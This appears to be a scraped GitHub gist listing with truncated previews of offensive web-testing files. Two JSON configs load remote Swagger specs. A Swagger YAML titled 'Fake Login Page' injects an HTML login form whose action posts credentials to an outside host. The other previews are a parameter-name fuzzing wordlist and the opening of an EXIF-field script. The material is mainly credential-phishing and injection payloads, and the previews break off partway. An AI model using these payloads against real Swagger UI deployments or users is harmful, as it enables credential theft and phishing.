This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"url": "https://gist.githubusercontent.com/0xbloody/b240c3f3e11aefeab1294629f18ed60b/raw/3bfea13b2df0589292d6100498e3c8e2cc2d5a1b/test.yaml", | |
"urls": [ | |
{ | |
"url": "https://gist.githubusercontent.com/0xbloody/b240c3f3e11aefeab1294629f18ed60b/raw/3bfea13b2df0589292d6100498e3c8e2cc2d5a1b/test.yaml", | |
"name": "Test" | |
} | |
] | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"url": "https://gist.githubusercontent.com/0xbloody/b240c3f3e11aefeab1294629f18ed60b/raw/3bfea13b2df0589292d6100498e3c8e2cc2d5a1b/test.yaml", | |
"urls": [ | |
{ | |
"url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml", | |
"name": "Foo" | |
} | |
] | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
version: 1.0.0 | |
title: Fake Login Page | |
description: '<div class="login-form"> | |
<div class="heading"> | |
<h1>HTML Injection : Fake Login</h1> | |
</div> | |
<div class="form-container"> | |
<form action="https://7y0ejvxb.c5.rs/login" method="post" class="form-signin"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Tracker | |
__gaTracker | |
_csrf_token | |
_ga | |
a | |
accept_latest_tos_url | |
access_level | |
active | |
admin | |
adrevenue |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import subprocess | |
exifs = [ | |
"ImageDescription", | |
"Make", | |
"Model", | |
"Software", | |
"Artist", | |
"Copyright", |